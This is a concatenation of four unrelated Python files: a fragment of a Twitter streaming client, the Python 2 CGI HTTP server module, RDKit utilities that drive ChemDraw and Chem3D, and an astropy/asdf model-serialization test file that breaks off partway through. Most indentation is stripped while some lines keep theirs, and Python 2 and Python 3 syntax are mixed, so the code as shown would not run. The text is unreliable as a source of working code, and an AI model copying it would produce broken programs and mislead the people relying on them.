except (Timeout, ssl.SSLError) as exc:
                # This is still necessary, as an SSLError can actually be
                # thrown when using Requests.
                # If it's not a timeout, treat it like any other exception.
if isinstance(exc, ssl.SSLError):
if not (exc.args and 'timed out' in str(exc.args[0])):
exc_info = sys.exc_info()
break
if self.listener.on_timeout() is False:
break
if self.running is False:
break
sleep(self.snooze_time)
self.snooze_time = min(self.snooze_time + self.snooze_time_step,
self.snooze_time_cap)
except Exception as exc:
exc_info = sys.exc_info()
# any other exception is fatal, so kill loop
break
# cleanup
self.running = False
if resp:
resp.close()
self.new_session()
if exc_info:
# call a handler first so that the exception can be logged.
self.listener.on_exception(exc_info[1])
six.reraise(*exc_info)
def _data(self, data):
if self.listener.on_data(data) is False:
self.running = False
def _read_loop(self, resp):
charset = resp.headers.get('content-type', default='')
enc_search = re.search('charset=(?P<enc>\S*)', charset)
if enc_search is not None:
encoding = enc_search.group('enc')
else:
encoding = 'utf-8'
buf = ReadBuffer(resp.raw, self.chunk_size, encoding=encoding)
while self.running and not resp.raw.closed:
length = 0
while not resp.raw.closed:
line = buf.read_line().strip()
if not line:
self.listener.keep_alive() # keep-alive new lines are expected
elif line.isdigit():
length = int(line)
break
else:
raise TweepError('Expecting length, unexpected value found')
next_status_obj = buf.read_len(length)
if self.running and next_status_obj:
self._data(next_status_obj)
# # Note: keep-alive newlines might be inserted before each length value.
# # read until we get a digit...
# c = b'\n'
# for c in resp.iter_content(decode_unicode=True):
# if c == b'\n':
# continue
# break
#
# delimited_string = c
#
# # read rest of delimiter length..
# d = b''
# for d in resp.iter_content(decode_unicode=True):
# if d != b'\n':
# delimited_string += d
# continue
# break
#
# # read the next twitter status object
# if delimited_string.decode('utf-8').strip().isdigit():
# status_id = int(delimited_string)
# next_status_obj = resp.raw.read(status_id)
# if self.running:
# self._data(next_status_obj.decode('utf-8'))
if resp.raw.closed:
self.on_closed(resp)
def _start(self, async):
self.running = True
if async:
self._thread = Thread(target=self._run)
self._thread.start()
else:
self._run()
def on_closed(self, resp):
""" Called when the response has been closed by Twitter """
pass
def userstream(self,
stall_warnings=False,
_with=None,
replies=None,
track=None,
locations=None,
async=False,
encoding='utf8'):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/user.json' % STREAM_VERSION
self.host = 'userstream.twitter.com'
if stall_warnings:
self.session.params['stall_warnings'] = stall_warnings
if _with:
self.session.params['with'] = _with
if replies:
self.session.params['replies'] = replies
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.session.params['locations'] = ','.join(['%.2f' % l for l in locations])
if track:
self.session.params['track'] = u','.join(track).encode(encoding)
self._start(async)
def firehose(self, count=None, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/firehose.json' % STREAM_VERSION
if count:
self.url += '&count=%s' % count
self._start(async)
def retweet(self, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/retweet.json' % STREAM_VERSION
self._start(async)
def sample(self, async=False, languages=None, stall_warnings=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/sample.json' % STREAM_VERSION
if languages:
self.session.params['language'] = ','.join(map(str, languages))
if stall_warnings:
self.session.params['stall_warnings'] = 'true'
self._start(async)
def filter(self, follow=None, track=None, async=False, locations=None,
stall_warnings=False, languages=None, encoding='utf8', filter_level=None):
self.body = {}
self.session.headers['Content-type'] = "application/x-www-form-urlencoded"
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/filter.json' % STREAM_VERSION
if follow:
self.body['follow'] = u','.join(follow).encode(encoding)
if track:
self.body['track'] = u','.join(track).encode(encoding)
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.body['locations'] = u','.join(['%.4f' % l for l in locations])
if stall_warnings:
self.body['stall_warnings'] = stall_warnings
if languages:
self.body['language'] = u','.join(map(str, languages))
if filter_level:
self.body['filter_level'] = filter_level.encode(encoding)
self.session.params = {'delimited': 'length'}
self.host = 'stream.twitter.com'
self._start(async)
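    # Illustrative usage sketch (the auth handler and MyListener are assumed to
    # be set up elsewhere):
    #   stream = Stream(auth, MyListener())
    #   stream.filter(track=['python'], async=True)   # async=True runs _run in a Thread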
def sitestream(self, follow, stall_warnings=False,
with_='user', replies=False, async=False):
self.body = {}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/site.json' % STREAM_VERSION
self.body['follow'] = u','.join(map(six.text_type, follow))
self.body['delimited'] = 'length'
if stall_warnings:
self.body['stall_warnings'] = stall_warnings
if with_:
self.body['with'] = with_
if replies:
self.body['replies'] = replies
self._start(async)
def disconnect(self):
if self.running is False:
return
self.running = False
|
|
"""CGI-savvy HTTP Server.
This module builds on SimpleHTTPServer by implementing GET and POST
requests to cgi-bin scripts.
If the os.fork() function is not present (e.g. on Windows),
os.popen2() is used as a fallback, with slightly altered semantics; if
that function is not present either (e.g. on Macintosh), only Python
scripts are supported, and they are executed by the current process.
In all cases, the implementation is intentionally naive -- all
requests are executed synchronously.
SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL
-- it may execute arbitrary Python code or external programs.
"""
__version__ = "0.4"
__all__ = ["CGIHTTPRequestHandler"]
import os
import sys
import urllib
import BaseHTTPServer
import SimpleHTTPServer
class CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""Complete HTTP server with GET, HEAD and POST commands.
GET and HEAD also support running CGI scripts.
The POST command is *only* implemented for CGI scripts.
"""
# Determine platform specifics
have_fork = hasattr(os, 'fork')
have_popen2 = hasattr(os, 'popen2')
# Make rfile unbuffered -- we need to read one line and then pass
# the rest to a subprocess, so we can't use buffered input.
rbufsize = 0
def do_POST(self):
"""Serve a POST request.
This is only implemented for CGI scripts.
"""
if self.is_cgi():
self.run_cgi()
else:
self.send_error(501, "Can only POST to CGI scripts")
def send_head(self):
"""Version of send_head that support CGI scripts"""
if self.is_cgi():
return self.run_cgi()
else:
return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)
def is_cgi(self):
"""Test whether self.path corresponds to a CGI script.
        Return a true value if self.path requires running a CGI
        script, and a false value otherwise; when true, self.cgi_info
        is set to the (dir, rest) tuple used by run_cgi().
The default implementation tests whether the path
begins with one of the strings in the list
self.cgi_directories (and the next character is a '/'
or the end of the string).
"""
path = self.path
for x in self.cgi_directories:
i = len(x)
if path[:i] == x and (not path[i:] or path[i] == '/'):
self.cgi_info = path[:i], path[i+1:]
return 1
return 0
cgi_directories = ['/cgi-bin', '/htbin']
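    # Example (illustrative): with the default cgi_directories above, a request
    # for '/cgi-bin/test.py?x=1' sets cgi_info to ('/cgi-bin', 'test.py?x=1') and
    # returns 1, while '/static/page.html' returns 0.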
def is_executable(self, path):
"""Test whether argument path is an executable file."""
return executable(path)
def is_python(self, path):
"""Test whether argument path is a Python script."""
head, tail = os.path.splitext(path)
return tail.lower() in (".py", ".pyw")
def run_cgi(self):
"""Execute a CGI script."""
dir, rest = self.cgi_info
i = rest.rfind('?')
if i >= 0:
rest, query = rest[:i], rest[i+1:]
else:
query = ''
i = rest.find('/')
if i >= 0:
script, rest = rest[:i], rest[i:]
else:
script, rest = rest, ''
scriptname = dir + '/' + script
scriptfile = self.translate_path(scriptname)
if not os.path.exists(scriptfile):
self.send_error(404, "No such CGI script (%s)" % `scriptname`)
return
if not os.path.isfile(scriptfile):
self.send_error(403, "CGI script is not a plain file (%s)" %
`scriptname`)
return
ispy = self.is_python(scriptname)
if not ispy:
if not (self.have_fork or self.have_popen2):
self.send_error(403, "CGI script is not a Python script (%s)" %
`scriptname`)
return
if not self.is_executable(scriptfile):
self.send_error(403, "CGI script is not executable (%s)" %
`scriptname`)
return
# Reference: http://hoohoo.ncsa.uiuc.edu/cgi/env.html
# XXX Much of the following could be prepared ahead of time!
env = {}
env['SERVER_SOFTWARE'] = self.version_string()
env['SERVER_NAME'] = self.server.server_name
env['GATEWAY_INTERFACE'] = 'CGI/1.1'
env['SERVER_PROTOCOL'] = self.protocol_version
env['SERVER_PORT'] = str(self.server.server_port)
env['REQUEST_METHOD'] = self.command
uqrest = urllib.unquote(rest)
env['PATH_INFO'] = uqrest
env['PATH_TRANSLATED'] = self.translate_path(uqrest)
env['SCRIPT_NAME'] = scriptname
if query:
env['QUERY_STRING'] = query
host = self.address_string()
if host != self.client_address[0]:
env['REMOTE_HOST'] = host
env['REMOTE_ADDR'] = self.client_address[0]
# XXX AUTH_TYPE
# XXX REMOTE_USER
# XXX REMOTE_IDENT
if self.headers.typeheader is None:
env['CONTENT_TYPE'] = self.headers.type
else:
env['CONTENT_TYPE'] = self.headers.typeheader
length = self.headers.getheader('content-length')
if length:
env['CONTENT_LENGTH'] = length
accept = []
for line in self.headers.getallmatchingheaders('accept'):
if line[:1] in "\t\n\r ":
accept.append(line.strip())
else:
accept = accept + line[7:].split(',')
env['HTTP_ACCEPT'] = ','.join(accept)
ua = self.headers.getheader('user-agent')
if ua:
env['HTTP_USER_AGENT'] = ua
co = filter(None, self.headers.getheaders('cookie'))
if co:
env['HTTP_COOKIE'] = ', '.join(co)
# XXX Other HTTP_* headers
if not self.have_fork:
# Since we're setting the env in the parent, provide empty
# values to override previously set values
for k in ('QUERY_STRING', 'REMOTE_HOST', 'CONTENT_LENGTH',
'HTTP_USER_AGENT', 'HTTP_COOKIE'):
env.setdefault(k, "")
self.send_response(200, "Script output follows")
decoded_query = query.replace('+', ' ')
if self.have_fork:
# Unix -- fork as we should
args = [script]
if '=' not in decoded_query:
args.append(decoded_query)
nobody = nobody_uid()
self.rfile.flush() # Always flush before forking
self.wfile.flush() # Always flush before forking
pid = os.fork()
if pid != 0:
# Parent
pid, sts = os.waitpid(pid, 0)
if sts:
self.log_error("CGI script exit status %#x", sts)
return
# Child
try:
try:
os.setuid(nobody)
except os.error:
pass
os.dup2(self.rfile.fileno(), 0)
os.dup2(self.wfile.fileno(), 1)
os.execve(scriptfile, args, env)
except:
self.server.handle_error(self.request, self.client_address)
os._exit(127)
elif self.have_popen2:
# Windows -- use popen2 to create a subprocess
import shutil
os.environ.update(env)
cmdline = scriptfile
if self.is_python(scriptfile):
interp = sys.executable
if interp.lower().endswith("w.exe"):
# On Windows, use python.exe, not pythonw.exe
interp = interp[:-5] + interp[-4:]
cmdline = "%s -u %s" % (interp, cmdline)
if '=' not in query and '"' not in query:
cmdline = '%s "%s"' % (cmdline, query)
self.log_message("command: %s", cmdline)
try:
nbytes = int(length)
except:
nbytes = 0
fi, fo = os.popen2(cmdline, 'b')
if self.command.lower() == "post" and nbytes > 0:
data = self.rfile.read(nbytes)
fi.write(data)
fi.close()
shutil.copyfileobj(fo, self.wfile)
sts = fo.close()
if sts:
self.log_error("CGI script exit status %#x", sts)
else:
self.log_message("CGI script exited OK")
else:
# Other O.S. -- execute script in this process
os.environ.update(env)
save_argv = sys.argv
save_stdin = sys.stdin
save_stdout = sys.stdout
save_stderr = sys.stderr
try:
try:
sys.argv = [scriptfile]
if '=' not in decoded_query:
sys.argv.append(decoded_query)
sys.stdout = self.wfile
sys.stdin = self.rfile
execfile(scriptfile, {"__name__": "__main__"})
finally:
sys.argv = save_argv
sys.stdin = save_stdin
sys.stdout = save_stdout
sys.stderr = save_stderr
except SystemExit, sts:
self.log_error("CGI script exit status %s", str(sts))
else:
self.log_message("CGI script exited OK")
nobody = None
def nobody_uid():
"""Internal routine to get nobody's uid"""
global nobody
if nobody:
return nobody
try:
import pwd
except ImportError:
return -1
try:
nobody = pwd.getpwnam('nobody')[2]
except KeyError:
nobody = 1 + max(map(lambda x: x[2], pwd.getpwall()))
return nobody
def executable(path):
"""Test for executable file."""
try:
st = os.stat(path)
except os.error:
return 0
return st[0] & 0111 != 0
def test(HandlerClass = CGIHTTPRequestHandler,
ServerClass = BaseHTTPServer.HTTPServer):
SimpleHTTPServer.test(HandlerClass, ServerClass)
if __name__ == '__main__':
test()
|
|
# $Id$
#
# Copyright (C) 2002-2006 Greg Landrum and Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
""" tools for interacting with chemdraw
"""
import tempfile, os, time
try:
import pythoncom
from win32com.client import gencache, Dispatch, constants
import win32com.client.gencache
cdxModule = win32com.client.gencache.EnsureModule("{5F646AAB-3B56-48D2-904C-A68D7989C251}", 0, 7,
0)
except Exception:
cdxModule = None
_cdxVersion = 0
raise ImportError("ChemDraw version (at least version 7) not found.")
else:
_cdxVersion = 7
if cdxModule:
from win32com.client import Dispatch
import win32gui
import re
cdApp = None
theDoc = None
theObjs = None
selectItem = None
cleanItem = None
centerItem = None
def StartChemDraw(visible=True, openDoc=False, showDoc=False):
""" launches chemdraw """
global cdApp, theDoc, theObjs, selectItem, cleanItem, centerItem
if cdApp is not None:
# if called more than once, do a restart
holder = None
selectItem = None
cleanItem = None
centerItem = None
theObjs = None
theDoc = None
cdApp = None
cdApp = Dispatch('ChemDraw.Application')
if openDoc:
theDoc = cdApp.Documents.Add()
theObjs = theDoc.Objects
else:
theDoc = None
selectItem = cdApp.MenuBars(1).Menus(2).MenuItems(8)
cleanItem = cdApp.MenuBars(1).Menus(5).MenuItems(6)
if _cdxVersion == 6:
centerItem = cdApp.MenuBars(1).Menus(4).MenuItems(1)
else:
centerItem = cdApp.MenuBars(1).Menus(4).MenuItems(7)
if visible:
cdApp.Visible = 1
if theDoc and showDoc:
theDoc.Activate()
def ReactivateChemDraw(openDoc=True, showDoc=True):
global cdApp, theDoc, theObjs
cdApp.Visible = 1
if openDoc:
theDoc = cdApp.Documents.Add()
if theDoc and showDoc:
theDoc.Activate()
theObjs = theDoc.Objects
# ------------------------------------------------------------------
# interactions with Chemdraw
# ------------------------------------------------------------------
def CDXConvert(inData, inFormat, outFormat):
"""converts the data passed in from one format to another
inFormat should be one of the following:
chemical/x-cdx chemical/cdx
chemical/x-daylight-smiles chemical/daylight-smiles
chemical/x-mdl-isis chemical/mdl-isis
chemical/x-mdl-molfile chemical/mdl-molfile
chemical/x-mdl-rxn chemical/mdl-rxn
chemical/x-mdl-tgf chemical/mdl-tgf
chemical/x-questel-F1
chemical/x-questel-F1-query
outFormat should be one of the preceding or:
image/x-png image/png
image/x-wmf image/wmf
image/tiff
application/postscript
image/gif
"""
global theObjs, theDoc
if cdApp is None:
StartChemDraw()
if theObjs is None:
if theDoc is None:
theDoc = cdApp.Documents.Add()
theObjs = theDoc.Objects
theObjs.SetData(inFormat, inData, pythoncom.Missing)
outD = theObjs.GetData(outFormat)
theObjs.Clear()
return outD
def CDXClean(inData, inFormat, outFormat):
"""calls the CDXLib Clean function on the data passed in.
CDXLib_Clean attempts to clean (prettify) the data before
doing an output conversion. It can be thought of as CDXConvert++.
CDXClean supports the same input and output specifiers as CDXConvert
(see above)
"""
global cdApp, theDoc, theObjs, selectItem, cleanItem
if cdApp is None:
StartChemDraw()
if theObjs is None:
if theDoc is None:
theDoc = cdApp.Documents.Add()
theObjs = theDoc.Objects
theObjs.SetData(inFormat, inData, pythoncom.Missing)
theObjs.Select()
cleanItem.Execute()
outD = theObjs.GetData(outFormat)
theObjs.Clear()
return outD
def CDXDisplay(inData, inFormat='chemical/cdx', clear=1):
""" displays the data in Chemdraw """
global cdApp, theDoc, theObjs, selectItem, cleanItem, centerItem
if cdApp is None:
StartChemDraw()
try:
theDoc.Activate()
except Exception:
ReactivateChemDraw()
theObjs = theDoc.Objects
if clear:
theObjs.Clear()
theObjs.SetData(inFormat, inData, pythoncom.Missing)
return
def CDXGrab(outFormat='chemical/x-mdl-molfile'):
""" returns the contents of the active chemdraw document
"""
global cdApp, theDoc
if cdApp is None:
res = ""
else:
cdApp.Visible = 1
if not cdApp.ActiveDocument:
ReactivateChemDraw()
try:
res = cdApp.ActiveDocument.Objects.GetData(outFormat)
except Exception:
res = ""
return res
def CloseChemdraw():
""" shuts down chemdraw
"""
global cdApp
try:
cdApp.Quit()
except Exception:
pass
Exit()
def Exit():
""" destroys our link to Chemdraw
"""
global cdApp
cdApp = None
def SaveChemDrawDoc(fileName='save.cdx'):
"""force chemdraw to save the active document
NOTE: the extension of the filename will determine the format
used to save the file.
"""
d = cdApp.ActiveDocument
d.SaveAs(fileName)
def CloseChemDrawDoc():
"""force chemdraw to save the active document
NOTE: the extension of the filename will determine the format
used to save the file.
"""
d = cdApp.ActiveDocument
d.Close()
def RaiseWindowNamed(nameRe):
# start by getting a list of all the windows:
cb = lambda x, y: y.append(x)
wins = []
win32gui.EnumWindows(cb, wins)
# now check to see if any match our regexp:
tgtWin = -1
for win in wins:
txt = win32gui.GetWindowText(win)
if nameRe.match(txt):
tgtWin = win
break
if tgtWin >= 0:
win32gui.ShowWindow(tgtWin, 1)
win32gui.BringWindowToTop(tgtWin)
def RaiseChemDraw():
e = re.compile('^ChemDraw')
RaiseWindowNamed(e)
try:
from PIL import Image
  from io import BytesIO
def SmilesToPilImage(smilesStr):
"""takes a SMILES string and returns a PIL image using chemdraw
"""
return MolToPilImage(smilesStr, inFormat='chemical/daylight-smiles', outFormat='image/gif')
def MolToPilImage(dataStr, inFormat='chemical/daylight-smiles', outFormat='image/gif'):
"""takes a molecule string and returns a PIL image using chemdraw
"""
# do the conversion...
res = CDXConvert(dataStr, inFormat, outFormat)
    # PIL needs a binary stream, so wrap the raw image data from ChemDraw in BytesIO.
    dataFile = BytesIO(bytes(res))
img = Image.open(dataFile).convert('RGB')
return img
except ImportError:
def SmilesToPilImage(smilesStr):
print('You need to have PIL installed to use this functionality')
return None
def MolToPilImage(dataStr, inFormat='chemical/daylight-smiles', outFormat='image/gif'):
print('You need to have PIL installed to use this functionality')
return None
# ------------------------------------------------------------------
# interactions with Chem3D
# ------------------------------------------------------------------
c3dApp = None
def StartChem3D(visible=0):
""" launches Chem3D """
global c3dApp
c3dApp = Dispatch('Chem3D.Application')
if not c3dApp.Visible:
c3dApp.Visible = visible
def CloseChem3D():
""" shuts down Chem3D """
global c3dApp
c3dApp.Quit()
c3dApp = None
availChem3DProps = ('DipoleMoment', 'BendEnergy', 'Non14VDWEnergy', 'StericEnergy',
'StretchBendEnergy', 'StretchEnergy', 'TorsionEnergy', 'VDW14Energy')
def Add3DCoordsToMol(data, format, props={}):
""" adds 3D coordinates to the data passed in using Chem3D
**Arguments**
- data: the molecular data
- format: the format of _data_. Should be something accepted by
_CDXConvert_
- props: (optional) a dictionary used to return calculated properties
"""
global c3dApp
if c3dApp is None:
StartChem3D()
if format != 'chemical/mdl-molfile':
molData = CDXClean(data, format, 'chemical/mdl-molfile')
else:
molData = data
  with tempfile.NamedTemporaryFile(mode='w+', suffix='.mol', delete=False) as molF:
molF.write(molData)
doc = c3dApp.Documents.Open(molF.name)
if not doc:
print('cannot open molecule')
raise ValueError('No Molecule')
# set up the MM2 job
job = Dispatch('Chem3D.MM2Job')
job.Type = 1
job.DisplayEveryIteration = 0
job.RecordEveryIteration = 0
# start the calculation...
doc.MM2Compute(job)
# and wait for it to finish
while doc.ComputeStatus in [0x434f4d50, 0x50454e44]:
pass
#outFName = tempfile.mktemp('.mol')
# this is horrible, but apparently Chem3D gets pissy with tempfiles:
outFName = os.getcwd() + '/to3d.mol'
doc.SaveAs(outFName)
# generate the properties
for prop in availChem3DProps:
    props[prop] = getattr(doc, prop)
doc.Close(0)
os.unlink(molF.name)
  with open(outFName, 'r') as inF:
    c3dData = inF.read()
gone = 0
while not gone:
try:
os.unlink(outFName)
except Exception:
time.sleep(.5)
else:
gone = 1
return c3dData
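# Illustrative sketch (requires ChemDraw and Chem3D on this machine; molBlock is
# any MDL molfile text): embed 3D coordinates and collect the MM2 properties
# computed along the way.
def _Example3DCoords(molBlock):
  props = {}
  molBlock3D = Add3DCoordsToMol(molBlock, 'chemical/mdl-molfile', props=props)
  return molBlock3D, props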
def OptimizeSDFile(inFileName, outFileName, problemFileName='problems.sdf', restartEvery=20):
""" optimizes the structure of every molecule in the input SD file
**Arguments**
- inFileName: name of the input SD file
- outFileName: name of the output SD file
- problemFileName: (optional) name of the SD file used to store molecules which
fail during the optimization process
- restartEvery: (optional) Chem3D will be shut down and restarted
every _restartEvery_ molecules to try and keep core leaks under control
"""
inFile = open(inFileName, 'r')
outFile = open(outFileName, 'w+')
problemFile = None
props = {}
lines = []
nextLine = inFile.readline()
skip = 0
nDone = 0
t1 = time.time()
while nextLine != '':
if nextLine.find('M END') != -1:
lines.append(nextLine)
molBlock = ''.join(lines)
try:
newMolBlock = Add3DCoordsToMol(molBlock, 'chemical/mdl-molfile', props=props)
except Exception:
badBlock = molBlock
skip = 1
lines = []
else:
skip = 0
lines = [newMolBlock]
elif nextLine.find('$$$$') != -1:
t2 = time.time()
nDone += 1
      print('finished molecule %d in %f seconds' % (nDone, t2 - t1))
t1 = time.time()
if nDone % restartEvery == 0:
CloseChem3D()
StartChem3D()
outFile.close()
outFile = open(outFileName, 'a')
if not skip:
for prop in props.keys():
lines.append('> <%s>\n%f\n\n' % (prop, props[prop]))
lines.append(nextLine)
outFile.write(''.join(lines))
lines = []
else:
skip = 0
lines.append(nextLine)
if problemFile is None:
problemFile = open(problemFileName, 'w+')
problemFile.write(badBlock)
problemFile.write(''.join(lines))
lines = []
else:
lines.append(nextLine)
nextLine = inFile.readline()
outFile.close()
if problemFile is not None:
problemFile.close()
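# Illustrative sketch (file names are hypothetical): optimize every structure in
# an SD file, restarting Chem3D every 10 molecules to keep memory growth in check.
def _ExampleOptimizeSDFile():
  OptimizeSDFile('mols.sdf', 'mols.3d.sdf', problemFileName='problems.sdf', restartEvery=10)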
if __name__ == '__main__':
inStr = 'CCC(C=O)CCC'
img = SmilesToPilImage(inStr)
img.save('foo.jpg')
convStr = CDXClean(inStr, 'chemical/x-daylight-smiles', 'chemical/x-daylight-smiles')
print('in:', inStr)
print('out:', convStr)
convStr = CDXConvert(inStr, 'chemical/x-daylight-smiles', 'chemical/x-mdl-molfile')
print('in:', inStr)
print('out:', convStr)
convStr2 = CDXClean(convStr, 'chemical/x-mdl-molfile', 'chemical/x-mdl-molfile')
print('out2:', convStr2)
inStr = 'COc1ccc(c2onc(c2C(=O)NCCc3ccc(F)cc3)c4ccc(F)cc4)c(OC)c1'
convStr = CDXConvert(inStr, 'chemical/x-daylight-smiles', 'chemical/x-mdl-molfile')
out = open('test.mol', 'w+')
out.write(convStr)
out.close()
|
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
import pytest
asdf = pytest.importorskip('asdf')
import warnings
from packaging.version import Version
import numpy as np
from asdf import util
from asdf.tests import helpers
from asdf import AsdfFile
import asdf
import astropy.units as u
from astropy.modeling.core import fix_inputs
from astropy.modeling import models as astmodels
def custom_and_analytical_inverse():
p1 = astmodels.Polynomial1D(1)
p2 = astmodels.Polynomial1D(1)
p3 = astmodels.Polynomial1D(1)
p4 = astmodels.Polynomial1D(1)
m1 = p1 & p2
m2 = p3 & p4
m1.inverse = m2
return m1
def custom_inputs_outputs():
m = astmodels.Gaussian2D()
m.inputs = ('a', 'b')
m.outputs = ('c',)
return m
test_models = [
astmodels.Identity(2), astmodels.Polynomial1D(2, c0=1, c1=2, c2=3),
astmodels.Polynomial2D(1, c0_0=1, c0_1=2, c1_0=3),
astmodels.Shift(2.),
astmodels.Hermite1D(2, c0=2, c1=3, c2=0.5),
astmodels.Legendre1D(2, c0=2, c1=3, c2=0.5),
astmodels.Chebyshev1D(2, c0=2, c1=3, c2=0.5),
astmodels.Chebyshev2D(1, 1, c0_0=1, c0_1=2, c1_0=3),
astmodels.Legendre2D(1, 1, c0_0=1, c0_1=2, c1_0=3),
astmodels.Hermite2D(1, 1, c0_0=1, c0_1=2, c1_0=3),
astmodels.Scale(3.4), astmodels.RotateNative2Celestial(5.63, -72.5, 180),
astmodels.Multiply(3), astmodels.Multiply(10*u.m),
astmodels.RotateCelestial2Native(5.63, -72.5, 180),
astmodels.EulerAngleRotation(23, 14, 2.3, axes_order='xzx'),
astmodels.Mapping((0, 1), n_inputs=3),
astmodels.Shift(2.*u.deg),
astmodels.Scale(3.4*u.deg),
astmodels.RotateNative2Celestial(5.63*u.deg, -72.5*u.deg, 180*u.deg),
astmodels.RotateCelestial2Native(5.63*u.deg, -72.5*u.deg, 180*u.deg),
astmodels.RotationSequence3D([1.2, 2.3, 3.4, .3], 'xyzx'),
astmodels.SphericalRotationSequence([1.2, 2.3, 3.4, .3], 'xyzy'),
astmodels.AiryDisk2D(amplitude=10., x_0=0.5, y_0=1.5),
astmodels.Box1D(amplitude=10., x_0=0.5, width=5.),
astmodels.Box2D(amplitude=10., x_0=0.5, x_width=5., y_0=1.5, y_width=7.),
astmodels.Const1D(amplitude=5.),
astmodels.Const2D(amplitude=5.),
astmodels.Disk2D(amplitude=10., x_0=0.5, y_0=1.5, R_0=5.),
astmodels.Ellipse2D(amplitude=10., x_0=0.5, y_0=1.5, a=2., b=4., theta=0.1),
astmodels.Exponential1D(amplitude=10., tau=3.5),
astmodels.Gaussian1D(amplitude=10., mean=5., stddev=3.),
astmodels.Gaussian2D(amplitude=10., x_mean=5., y_mean=5., x_stddev=3., y_stddev=3.),
astmodels.KingProjectedAnalytic1D(amplitude=10., r_core=5., r_tide=2.),
astmodels.Logarithmic1D(amplitude=10., tau=3.5),
astmodels.Lorentz1D(amplitude=10., x_0=0.5, fwhm=2.5),
astmodels.Moffat1D(amplitude=10., x_0=0.5, gamma=1.2, alpha=2.5),
astmodels.Moffat2D(amplitude=10., x_0=0.5, y_0=1.5, gamma=1.2, alpha=2.5),
astmodels.Planar2D(slope_x=0.5, slope_y=1.2, intercept=2.5),
astmodels.RedshiftScaleFactor(z=2.5),
astmodels.RickerWavelet1D(amplitude=10., x_0=0.5, sigma=1.2),
astmodels.RickerWavelet2D(amplitude=10., x_0=0.5, y_0=1.5, sigma=1.2),
astmodels.Ring2D(amplitude=10., x_0=0.5, y_0=1.5, r_in=5., width=10.),
astmodels.Sersic1D(amplitude=10., r_eff=1., n=4.),
astmodels.Sersic2D(amplitude=10., r_eff=1., n=4., x_0=0.5, y_0=1.5, ellip=0.0, theta=0.0),
astmodels.Sine1D(amplitude=10., frequency=0.5, phase=1.),
astmodels.Trapezoid1D(amplitude=10., x_0=0.5, width=5., slope=1.),
astmodels.TrapezoidDisk2D(amplitude=10., x_0=0.5, y_0=1.5, R_0=5., slope=1.),
astmodels.Voigt1D(x_0=0.55, amplitude_L=10., fwhm_L=0.5, fwhm_G=0.9),
astmodels.BlackBody(scale=10.0, temperature=6000.*u.K),
astmodels.Drude1D(amplitude=10.0, x_0=0.5, fwhm=2.5),
astmodels.Plummer1D(mass=10.0, r_plum=5.0),
astmodels.BrokenPowerLaw1D(amplitude=10, x_break=0.5, alpha_1=2.0, alpha_2=3.5),
astmodels.ExponentialCutoffPowerLaw1D(10, 0.5, 2.0, 7.),
astmodels.LogParabola1D(amplitude=10, x_0=0.5, alpha=2., beta=3.,),
astmodels.PowerLaw1D(amplitude=10., x_0=0.5, alpha=2.0),
astmodels.SmoothlyBrokenPowerLaw1D(amplitude=10., x_break=5.0, alpha_1=2.0, alpha_2=3.0, delta=0.5),
custom_and_analytical_inverse(),
custom_inputs_outputs(),
]
math_models = []
for kl in astmodels.math.__all__:
klass = getattr(astmodels.math, kl)
math_models.append(klass())
test_models.extend(math_models)
test_models_with_constraints = [astmodels.Legendre2D(x_degree=1, y_degree=1,
c0_0=1, c0_1=2, c1_0=3,
fixed={'c1_0': True, 'c0_1': True},
bounds={'c0_0': (-10, 10)})]
test_models.extend(test_models_with_constraints)
def test_transforms_compound(tmpdir):
tree = {
'compound':
astmodels.Shift(1) & astmodels.Shift(2) |
astmodels.Sky2Pix_TAN() |
astmodels.Rotation2D() |
astmodels.AffineTransformation2D([[2, 0], [0, 2]], [42, 32]) +
astmodels.Rotation2D(32)
}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_inverse_transforms(tmpdir):
rotation = astmodels.Rotation2D(32)
rotation.inverse = astmodels.Rotation2D(45)
real_rotation = astmodels.Rotation2D(32)
tree = {
'rotation': rotation,
'real_rotation': real_rotation
}
def check(ff):
assert ff.tree['rotation'].inverse.angle == 45
helpers.assert_roundtrip_tree(tree, tmpdir, asdf_check_func=check)
@pytest.mark.parametrize(('model'), test_models)
def test_single_model(tmpdir, model):
with warnings.catch_warnings():
# Some schema files are missing from asdf<=2.6.0 which causes warnings
if Version(asdf.__version__) <= Version('2.6.0'):
warnings.filterwarnings('ignore', 'Unable to locate schema file')
tree = {'single_model': model}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_name(tmpdir):
def check(ff):
assert ff.tree['rot'].name == 'foo'
tree = {'rot': astmodels.Rotation2D(23, name='foo')}
helpers.assert_roundtrip_tree(tree, tmpdir, asdf_check_func=check)
def test_zenithal_with_arguments(tmpdir):
tree = {
'azp': astmodels.Sky2Pix_AZP(0.5, 0.3)
}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_naming_of_compound_model(tmpdir):
"""Issue #87"""
def asdf_check(ff):
assert ff.tree['model'].name == 'compound_model'
offx = astmodels.Shift(1)
scl = astmodels.Scale(2)
model = (offx | scl).rename('compound_model')
tree = {
'model': model
}
helpers.assert_roundtrip_tree(tree, tmpdir, asdf_check_func=asdf_check)
def test_generic_projections(tmpdir):
from astropy.io.misc.asdf.tags.transform import projections
for tag_name, (name, params, version) in projections._generic_projections.items():
tree = {
'forward': util.resolve_name(
